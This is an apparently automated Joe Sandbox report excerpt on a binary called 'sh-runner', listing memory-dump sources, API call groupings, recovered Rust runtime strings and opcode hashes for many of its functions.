                                                                      • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF72BD034FC
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastclosesocket$setsockopt
                                                                      • String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
                                                                      • API String ID: 3650012124-3544120690
                                                                      • Opcode ID: d47c76e6e9d720925800198ac07a3b88dbc601ea0d71c1488436e5c7a1cfe4da
                                                                      • Instruction ID: fcb82ef422477da011b8e79dad2efbb9229b9e182aad61e1e693ab2e86651d26
                                                                      • Opcode Fuzzy Hash: d47c76e6e9d720925800198ac07a3b88dbc601ea0d71c1488436e5c7a1cfe4da
                                                                      • Instruction Fuzzy Hash: 6741B431E089918AF725AFA9E8012ECB371EF48364F908135DE9D07BA4EF3CA595C750
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle$FileSleep$ErrorLastReadWritememset
                                                                      • String ID:
                                                                      • API String ID: 3673338832-0
                                                                      • Opcode ID: e52f2a1764aa238fb1dbfc6f9750715354cb54e67f274e2a414de41ba221774f
                                                                      • Instruction ID: 5d893b8ee3a41a4bab3c18f3ee74f352aebed39f5dca580b58eb9290e363eff3
                                                                      • Opcode Fuzzy Hash: e52f2a1764aa238fb1dbfc6f9750715354cb54e67f274e2a414de41ba221774f
                                                                      • Instruction Fuzzy Hash: 9851A4226086C385E739AF29DC013F9A750FF497C8F888835DD5C5BB99CE3D95859B10
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$Socket$HandleInformationclosesocketmemset
                                                                      • String ID:
                                                                      • API String ID: 3407399761-0
                                                                      • Opcode ID: 140b85e330145a5fbd53759121481a4a4443c71e07aa3ac1224e103824d8c2c0
                                                                      • Instruction ID: 677adf1253434ae47974724a300a5e138c063317588ed059c481fb9144f11c93
                                                                      • Opcode Fuzzy Hash: 140b85e330145a5fbd53759121481a4a4443c71e07aa3ac1224e103824d8c2c0
                                                                      • Instruction Fuzzy Hash: 00219321A084518AF728FA6DD8047E96650DB483B4F944734DD7C577E9DE2CF9868F20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: memcmp
                                                                      • String ID: SPSR_ABT$SPSR_FIQ$SPSR_IRQ$SPSR_SVC$SPSR_UND$TPIDRUROTPIDRURWTPIDPRHTPIDPRSPLRPCACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPI
                                                                      • API String ID: 1475443563-2082546588
                                                                      • Opcode ID: a5744e36c4bea7f5d191b94c1d72be41caabd032e735eb1ff01fa44516a9d2bf
                                                                      • Instruction ID: 533a4dca7e775d5b55d060c0f5f48b280e6f42211ca9a5523318eb16c086b408
                                                                      • Opcode Fuzzy Hash: a5744e36c4bea7f5d191b94c1d72be41caabd032e735eb1ff01fa44516a9d2bf
                                                                      • Instruction Fuzzy Hash: 04118F12A1E54380EE383E5D5C403F88591EF28789F845836CE5F8A3A7DD3DE4899E65
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: AddressSingleWake$memcpymemset
                                                                      • String ID:
                                                                      • API String ID: 1221183280-0
                                                                      • Opcode ID: c98d944e47c1db278127765e89b4a58d2ef7c878acf41f52b467c5e436d244b6
                                                                      • Instruction ID: 8f4468c088582fe6f22923efb3886d5bf456864d2309b6a3b2a67b83caca46e8
                                                                      • Opcode Fuzzy Hash: c98d944e47c1db278127765e89b4a58d2ef7c878acf41f52b467c5e436d244b6
                                                                      • Instruction Fuzzy Hash: 6312C122E08A8285F719AB28EC413F9A7A0EF54754FC88535DE5D537B2DF3CA485CB60
                                                                      APIs
                                                                      Strings
                                                                      • environment variable not foundenvironment variable was not valid unicode: , xrefs: 00007FF72BCF74AD
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnvironmentVariable
                                                                      • String ID: environment variable not foundenvironment variable was not valid unicode:
                                                                      • API String ID: 2691138088-3632183283
                                                                      • Opcode ID: 757dab13e25a7c8ddd6506cf2420c1fe1d395597a0a294d95c5351c0eeb6cab5
                                                                      • Instruction ID: 7d412fcdb58c27527ba4ad851d9c55e2c7d14e21b7da2c5b43b9c18a8d0e6022
                                                                      • Opcode Fuzzy Hash: 757dab13e25a7c8ddd6506cf2420c1fe1d395597a0a294d95c5351c0eeb6cab5
                                                                      • Instruction Fuzzy Hash: 4BB1A376B04A8285EB24AF6DDC543EDA364FB05B88F844036DE5C5B7A9CF3DE2858710
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$FullNamePathmemcmpmemcpy
                                                                      • String ID:
                                                                      • API String ID: 2015650653-0
                                                                      • Opcode ID: 6ec72101eed3a8b9d1e05b762d31c4b4c24d2468d9e7dbc6369698527e32f3da
                                                                      • Instruction ID: a28fdd01e54e00fd0acd69225e83423432ae7d154970f94b306cb2d891b23610
                                                                      • Opcode Fuzzy Hash: 6ec72101eed3a8b9d1e05b762d31c4b4c24d2468d9e7dbc6369698527e32f3da
                                                                      • Instruction Fuzzy Hash: 53A1C462B18B9246EB69AF39DC443F9A255FF84BC8F845035DD4C477AACE7CD2418720
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: freeaddrinfo
                                                                      • String ID: $assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
                                                                      • API String ID: 2731292433-2757504381
                                                                      • Opcode ID: b2126607e93d647e9f91e76f4849ef41876095a8296fa520854c0728ff80945c
                                                                      • Instruction ID: 41e38146466cf11f3f3e6719507721f7924edcb0b012c1ec52308efc3da52660
                                                                      • Opcode Fuzzy Hash: b2126607e93d647e9f91e76f4849ef41876095a8296fa520854c0728ff80945c
                                                                      • Instruction Fuzzy Hash: 3DA19C72A05A518AE718EF59E8406FDBBB0FB88B48F918439CE4D03764DF38D981CB50
                                                                      APIs
                                                                      Strings
                                                                      • assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 00007FF72BD22820
                                                                      • peerTcpListenerUdpSocket.debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwostd\src\..\..\backtrace\src\symbolize\gimli.rs, xrefs: 00007FF72BD229AB
                                                                      • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF72BD22838
                                                                      • TcpStream, xrefs: 00007FF72BD22878
                                                                      • addr, xrefs: 00007FF72BD22911
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID: TcpStream$addr$assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs$peerTcpListenerUdpSocket.debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwostd\src\..\..\backtrace\src\symbolize\gimli.rs
                                                                      • API String ID: 1452528299-1411357719
                                                                      • Opcode ID: 5a2e41fcac08ccb2f5ed9207fd46638074952570b4c48c36a9c3ef2ce86c36f3
                                                                      • Instruction ID: 2c3a25964047147c33d06c9eda4b50524a579544b6a410b9cbbcd346b6c351b7
                                                                      • Opcode Fuzzy Hash: 5a2e41fcac08ccb2f5ed9207fd46638074952570b4c48c36a9c3ef2ce86c36f3
                                                                      • Instruction Fuzzy Hash: 86918221A1869285FB19AF58E8413FCA370EF45758F848136EE8D17766EF3CE685C720
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$CurrentDirectoryFileModuleName
                                                                      • String ID:
                                                                      • API String ID: 1505103792-0
                                                                      • Opcode ID: 4813931b110c6182fb8258efcf567a37ceb1165433f20795709e4602d9828197
                                                                      • Instruction ID: 38a658e53c2b1576bd602c2a5e5046580a30c3cc97469b06837dcca15433f853
                                                                      • Opcode Fuzzy Hash: 4813931b110c6182fb8258efcf567a37ceb1165433f20795709e4602d9828197
                                                                      • Instruction Fuzzy Hash: FE71E262F1468189FB29AB79EC043F9A255FF44BD8F805135EE1C577DADF2CA2818710
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateFirstHandleModule32SnapshotToolhelp32memset
                                                                      • String ID:
                                                                      • API String ID: 33593729-0
                                                                      • Opcode ID: 21daa49ce758a76851dd5922f0c5d513dd76b202e35a61d6fd3b3e2c72f029fb
                                                                      • Instruction ID: 01046f51b9eefe508333a49c7b6034b7a308b63d24e36a23d3f38df343005330
                                                                      • Opcode Fuzzy Hash: 21daa49ce758a76851dd5922f0c5d513dd76b202e35a61d6fd3b3e2c72f029fb
                                                                      • Instruction Fuzzy Hash: CB81E861A086C24AEB78AB29CC147F96361FB05BE8FC48135DE5C1B7D6CF3C95858B24
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: Address$Wake$Single$ErrorLastWait
                                                                      • String ID: called `Result::unwrap()` on an `Err` value
                                                                      • API String ID: 798958160-2333694755
                                                                      • Opcode ID: e2c6ed504ba8107884ec7595559c41f4a93c5bc78c5009b79800c88f58580a1a
                                                                      • Instruction ID: 9e42f25feaebd090eaa600f84de803bd1317255bab3ecb4d48f2f31c42620b52
                                                                      • Opcode Fuzzy Hash: e2c6ed504ba8107884ec7595559c41f4a93c5bc78c5009b79800c88f58580a1a
                                                                      • Instruction Fuzzy Hash: 2351DB21A0D68246FA29AF6DAC002FAA760EF24754F844935DFDD036E2CE3CF4418B20
                                                                      APIs
                                                                      Strings
                                                                      • assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 00007FF72BD03930
                                                                      • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF72BD03948
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$getpeernamesetsockopt
                                                                      • String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
                                                                      • API String ID: 2225440259-3544120690
                                                                      • Opcode ID: 4e6500ef247e5211302496dac379e2d7bb86f636a011938257614adb463dc771
                                                                      • Instruction ID: ecab5cb7d90d236a44736e028bb14b4119088c444077b57e41d427d3bc1a4229
                                                                      • Opcode Fuzzy Hash: 4e6500ef247e5211302496dac379e2d7bb86f636a011938257614adb463dc771
                                                                      • Instruction Fuzzy Hash: 8841D921D185918AF329AF68E8412FCB370EF44318F949135EE9D427A1EF3C96C5C751
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: AddressCaptureContextEntryFunctionLookupSingleUnwindVirtualWakememset
                                                                      • String ID:
                                                                      • API String ID: 2014759167-0
                                                                      • Opcode ID: 8fecb2d7b38c102e24f7d548581241a1708a972fe1595f8de14360d101d8d413
                                                                      • Instruction ID: 24c99fea1bc7a46c6a0fa2b26bd46260f41a159fb65ab4354fcc2dee857d3605
                                                                      • Opcode Fuzzy Hash: 8fecb2d7b38c102e24f7d548581241a1708a972fe1595f8de14360d101d8d413
                                                                      • Instruction Fuzzy Hash: 1E916E62605BC189EB74AF28DC403E967A0FB44798F84413ADF4C5BBA9DF38A584C754
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$Handle$CloseFinalNamePath
                                                                      • String ID:
                                                                      • API String ID: 3328380333-0
                                                                      • Opcode ID: cce2e92626dcaf6cbdcd668c325d07161b7a85dd1c0f94e95153eae62401de72
                                                                      • Instruction ID: 697be838cfaf792608a060a575404211bb26f073d4b59cb13520215fc15b9e66
                                                                      • Opcode Fuzzy Hash: cce2e92626dcaf6cbdcd668c325d07161b7a85dd1c0f94e95153eae62401de72
                                                                      • Instruction Fuzzy Hash: 3D71E522A18BC145EB39AF79ED443F9A254EB44BD8F809135DE8C577A9DF3D92808B10
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandleOverlappedResult
                                                                      • String ID:
                                                                      • API String ID: 1555921936-0
                                                                      • Opcode ID: dfbb019512cb01cfff0d376b161d343788e31632958b41f29bd11ca82096159d
                                                                      • Instruction ID: a543891456067824ed3397dd6813c86b22c5854d37f50a47634e64ba8e53b4e0
                                                                      • Opcode Fuzzy Hash: dfbb019512cb01cfff0d376b161d343788e31632958b41f29bd11ca82096159d
                                                                      • Instruction Fuzzy Hash: E161D726F1864188FB14EB79C8413FC6BA0EB94788F946535DE0D52BA9DF38D18587A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
